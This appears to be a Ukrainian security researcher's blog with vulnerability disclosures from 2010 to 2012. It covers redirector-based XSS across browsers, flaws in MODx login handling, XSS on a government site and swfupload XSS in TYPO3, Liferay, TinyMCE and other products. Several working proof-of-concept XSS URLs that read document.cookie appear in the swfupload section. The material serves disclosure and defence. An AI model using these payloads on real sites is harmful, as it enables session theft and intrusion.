Websecurity - Веб безпека

05.08.2010

У листопаді, 30.11.2009, я виявив Cross-Site Scripting уразливості в різних браузерах. Зокрема в Mozilla Firefox, Internet Explorer, Google Chrome та Opera.

Дані уразливості дозволяють виконувати XSS атаки на численні сайти, в тому числі ті, що не мають XSS уразливостей (блокують відповідні XSS атаки). Тобто браузери дозволяють обходити дані XSS фільтри. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам браузерів.

28.11.2012

Дане дослідження є продовженням моїх досліджень Cross-Site Scripting атаки через редиректори та Cross-Site Scripting через редиректори 301 і 303 в різних браузерах (зроблених в 2009 і 2012 роках відповідно). Після анонсу в серпні 2010, я планував встановити декілька нових браузерів, провести дослідження в них (на додачу до раніше зроблених в інших браузерах) і найближчим часом опублікувати результати, але публікація відклалася. Лише у вересні цього року я зробив додаткові дослідження з 301 і 303 редиректорами (для вищезгаданої і цієї статті), та почав оприлюднювати результати.

Редиректори можуть використовуватися для проведення XSS атак на сайти, що дозволяють вказувати адресу фрейма. При включенні редиректора у frame чи iframe можна провести XSS атаку. Це Remote XSS Include (RXI) підкласс Cross-Site Scripting уразливостей і вони достатньо поширені в Інтернеті.

Код спрацює по різному в різних браузерах - так само як і при прямому запиті до редиректорів, описаних у вищезгаданих статтях. В одних браузерах працює атака через одні редиректори, в інших - через інші.

XSS:

Атака працює в наступних редиректорах:

1. Через Location редиректор (301 Moved Permanently) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 9.52, 10.62 без доступу до кукісів та DoS в IE7
2. Через Location редиректор (301 Moved Permanently) javascript: URI - працює в Opera 10.62 (як Strictly social XSS) без доступу до кукісів
3. Через Location редиректор (302 Found) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 9.52, 10.62 (як Strictly social XSS) без доступу до кукісів та DoS в IE7
4. Через Location редиректор (302 Found, Object Moved або Moved Temporarily) javascript: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28 як Strictly social XSS, код виконається в контексті сайта з редиректором, Opera 10.62 (як Strictly social XSS без доступу до кукісів)
5. Через Refresh редиректор data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 без доступу до кукісів та Chrome
6. Через Refresh редиректор javascript: URI - працює в Firefox (до версії 3.0.9), IE6, Chrome та Opera 9.52 (до версії 10)
7. Через Location редиректор (303 See other) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 10.62 без доступу до кукісів та DoS в IE7
8. Через Location редиректор (303 See other) javascript: URI - працює в Opera 10.62 (як Strictly social XSS) без доступу до кукісів

Атака №4 працює в Mozilla Firefox 8.0.1 та попередніх версіях, а в версіях 9.0.1, 10.0.7, 15.0.1 вже ні - видає “Corrupted Content Error”. Тобто дана уразливість була приховано виправлена в версії 9.0. Мозілі я повідомив про ці атаки на їхній браузер ще 07.08.2010.

Дані уразливості дозволяють проводити універсальну XSS атаку на сайтах, що дозволяють вказувати адресу frame/iframe, навіть якщо вони напряму не допускають XSS (блокують javascript, vbscript і data URI). Найкраще для атаки підходить Refresh-редиректори.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Calendar-Script, Eco-Annu та Related Posts Exit Popup. Для котрих з’явилися експлоіти. Calendar-Script - це органайзер і календар, Eco-Annu - це плагін для створення карти на базі Google Maps, Related Posts Exit Popup - це плагін для виведення попапу з пов’язаними постами при закритті сторінки сайта.

• WordPress Calendar-Script Blind SQL Injection (деталі)
• WordPress Eco-Annu SQL Injection (деталі)
• WordPress Related Posts Exit Popup SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

11.07.2012

У липні, 04.07.2012, я знайшов Cross-Site Scripting уразливості на http://www.kmu.gov.ua - сайті Кабінету Міністрів України. Одну уразливість виявив AmplenuS, про що повідомив мені, а коли я її перевірив, то я знайшов іще одну. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже неодноразово писав про дірки на сайті Кабміну. В останнє - коли писав про уразливості на kvs.gov.ua, dcz.gov.ua та kmu.gov.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.11.2012

XSS:

• alert(document.cookie)
• alert(document.cookie)

Дані уразливості вже виправлені. Але як і в попередні роки (починаючи з 2006 року), коли я повідомляв Кабміну про уразливості на їхньому сайті, подякувати вони не спромоглися.

При цьому на сайті все ще є інші уразливості. Тобто що в 2006, що в 2012 році, Кабмін та інші міністерства ведуть себе невдячно і продовжують не слідкувати за безпекою власних сайтів.

28.06.2012

У травні, 18.05.2012, під час пентесту, я виявив багато уразливостей в системі MODx, зокрема Cross-Site Request Forgery, Abuse of Functionality, Denial of Service та Insufficient Anti-automation. Це друга порція уразливостей в MODx. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

24.11.2012

Cross-Site Request Forgery (WASC-09):

Відсутність захисту від Brute Force (такого як капча) в формі логіна (http://site/manager/) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта). Це також може бути використано для автоматизованого входу в акаунт, фішинга та інших автоматизованих атак. Нижченаведена DoS атака проводиться через дану CSRF уразливість.

Abuse of Functionality (Login Enumeration) (WASC-42):

В формі логіна (http://site/manager/) можливий підбір логінів. Якщо блокування не спрацьовує після трьох запитів (як може бути встановлене на сайті), значить немає такого логіна в системі, тобто воно спрацьовує лише для робочих логінів. Атака можлива, якщо включене блокування.

Експлоіт:

MODx Abuse of Functionality-1.html

Abuse of Functionality (WASC-42):

Після знаходження логіна з вищезгаданою уразливістю можливе зловживання блокуванням акаунтів. Після трьох запитів (як може бути встановлене на сайті) акаунт може бути заблокований (навіть акаунт адміна). Постійно посилаючи запити до цього функціоналу (по три некоректні запити), можна постійно тримати акаунт заблокованим (в тому числі адмінський).

Експлоіт:

MODx Abuse of Functionality-2.html

Denial of Service (WASC-10):

Посилаючи POST запит скрипту http://site/manager/processors/login.processor.php, він повертається на попередню сторінку, яка знову відсилає запит до цього скрипта. Таким чином створюється Looped DoS, що може створити навантаження на сервер.

Експлоіт:

MODx Looped DoS.html

Insufficient Anti-automation (WASC-21):

В формі логіна (http://site/manager/) немає захисту від автоматизований запитів, що дозволяє автоматизовано підбирати логіни (через Abuse of Functionality уразливість). Так само як автоматизовано підбирати паролі (через Brute Force уразливість) до підібраних логінів. А також проводити автоматизоване блокування виявлених акаунтів.

В формі відновлення паролю (http://site/manager/index.php ?action=show_form) немає захисту від автоматизований запитів, що дозволяє автоматизовано підбирати емайли користувачів.

Уразливі MODx 1.0.6 та попередні версії.

В даній добірці уразливості в веб додатках:

• Multiple integer overflows in libxml2 (деталі)
• PIAF H.M.S - SQL Injection (деталі)
• request-tracker3.8 security update (деталі)
• rtfm security update (деталі)
• HP iNode Management Center, Remote Execution of Arbitrary Code (деталі)
• Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 (деталі)
• SQL Injection Vulnerability in OrangeHRM (деталі)
• Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution Vulnerability (деталі)
• (0Day) HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability (деталі)
• PrestaShop <= 1.5.1 Persistent XSS (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах UK Cookie, Hitasoft FLV Player та Kakao Theme. Для котрих з’явилися експлоіти. UK Cookie - це плагін для сайтів в Великобританнії, де з 26.05.2012 почали діяти штрафи стосовно cookies, Hitasoft FLV Player - це FLV-плеєр, Kakao Theme - це тема движка.

• Reflective XSS in uk cookie plugin (деталі)
• WordPress Hitasoft FLV Player 1.1 SQL Injection (деталі)
• WordPress Kakao Theme SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я писав про XSS уразливість в TinyMCE, SPIP, Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередніх записах я писав про веб додатки з swfupload_f8.swf, swfupload_f9.swf і swfupload.swf (які призначені для Flash Player 8, 9 і 10), то зараз я напишу про веб додатки з swfupload_f10.swf та swfupload_f11.swf, які призначені для Flash Player 10 і 11. Зокрема я виявив дану Cross-Site Scripting уразливість в SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir - серед багатьох веб додатків, що постачаються з swfupload_f10.swf або swfupload_f11.swf.

XSS:

SwfUploadPanel для TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin для TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Archiv plugin для TinyMCE окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Liferay Portal окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Swfupload для Drupal:

Як можна побачити з проекту http://code.google.com/p/drupal-swfupload/ - існує версія Swfupload для Drupal. Але саме в цьому проекті немає файлів. Зате вони є в проекті Respectiva, що представляє собою Drupal з Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload для Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Це стосовно swfupload_f10.swf. А стосовно swfupload_f11.swf, то в індексі Гугла є лише один проект - SentinelleOnAir, що містить swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Уразливі потенційно всі версії SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Цього року я вже писав про численні уразливості в Akismet для WordPress. Він є core-плагіном (починаючи з версії WP 2.0), тому ці уразливості також стосуються самого WordPress. А в жовтні були виявлені та оприлюднені дві Cross-Site Scripting уразливості в Akismet. Які стосуються невідомої версії плагіна (потенційно останньої версії). Вони були знайдені Nafsh.

Раніше я вже писав про XSS уразливість в swfupload в WordPress.

XSS:

В плагіні в скрипті legacy.php через параметр s та в скрипті admin.php через параметр url можна проводити XSS атаки. При цьому обходячи існуючі захисні фільтри.

• WordPress Akismet Cross Site Scripting (http://packetstormsecurity.org/files/117063/WordPress-Akismet-Cross-Site-Scripting.html)

При цьому автор зазначає, що атака відбувається при відправленні POST запитів до legacy.php і admin.php. Але при зверненні до цих скриптів (будь то GET чи POST запит), виводиться повідомлення про помилку (з FPD, про які я писав раніше). І автор наводить експлоіт для XSS в legacy.php - ясна річ неробочий (з вищенаведеної причини). Тому дані уразливості викликають сумніви, як враховуючи те, що атакуючі запити потрібно посилати іншим скриптам, так і наявність фільтрації вказаних параметрів (явно фейкові дірки).

Уразливі WordPress 3.x та попередні версії, що постачаються з вразливими версіями Akismet.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах AJAX post Search, FoxyPress та Spider WordPress. Для котрих з’явилися експлоіти. AJAX post Search - це пошуковий плагін, FoxyPress - це e-commerce плагін для створення онлайн-магазина, Spider WordPress - це плагін для створення каталогу продуктів.

• Sql injection in AJAX post Search wordpress plugin (деталі)
• WordPress FoxyPress 0.4.2.5 XSS / CSRF / SQL Injection (деталі)
• WordPress Catalog HTML Injection / Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Cisco Application Control Engine Administrator IP Address Overlap Vulnerability (деталі)
• XSS Vulnerabilities in ClipBucket (деталі)
• VaM Shop Cross-Site Scripting and Blind SQL Injection Vulnerabilities (деталі)
• Smf 2.0.2 Cross-Site Scripting Vulnerability (деталі)
• McAfee SmartFilter Administration Server SFAdminSrv.exe JBoss RMI Remote Code Execution Vulnerabilty (деталі)
• Inventory 1.0 Multiple SQL Vulnerabilities (деталі)
• Inventory 1.0 Multiple XSS Vulnerabilities (деталі)
• viewvc security update (деталі)
• Vulnerability in apache-mod_auth_openid (деталі)
• Layton Helpbox 4.4.0 Multiple Security Issues (деталі)